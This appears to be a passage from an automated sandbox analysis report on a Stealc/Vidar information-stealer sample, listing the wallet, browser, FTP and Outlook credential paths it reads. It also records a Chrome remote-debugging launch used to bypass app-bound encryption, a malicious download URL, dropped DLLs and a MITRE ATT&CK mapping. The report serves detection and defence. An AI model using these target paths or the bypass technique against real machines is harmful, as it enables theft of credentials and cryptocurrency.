Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.}>
Source: file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 4592, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2719068067.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2720777420.000000000109E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2160777148.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4592, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 4592, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB70C40 sqlite3_bind_zeroblob,	0_2_6CB70C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB70D60 sqlite3_bind_parameter_name,	0_2_6CB70D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA98EA0 sqlite3_clear_bindings,	0_2_6CA98EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB70B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6CB70B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA96410 bind,WSAGetLastError,	0_2_6CA96410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA960B0 listen,WSAGetLastError,	0_2_6CA960B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA9C030 sqlite3_bind_parameter_count,	0_2_6CA9C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA96070 PR_Listen,	0_2_6CA96070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA9C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6CA9C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA222D0 sqlite3_bind_blob,	0_2_6CA222D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA963C0 PR_Bind,	0_2_6CA963C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA99480 sqlite3_bind_null,	0_2_6CA99480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA994F0 sqlite3_bind_text16,	0_2_6CA994F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA994C0 sqlite3_bind_text,	0_2_6CA994C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA99400 sqlite3_bind_int64,	0_2_6CA99400

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	112 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	237 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	121 Masquerading	Cached Domain Credentials	651 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	241 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	241 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://185.215.113.206/68b591d6548ec281/freebl3.dllj7	100%	Avira URL Cloud	malware
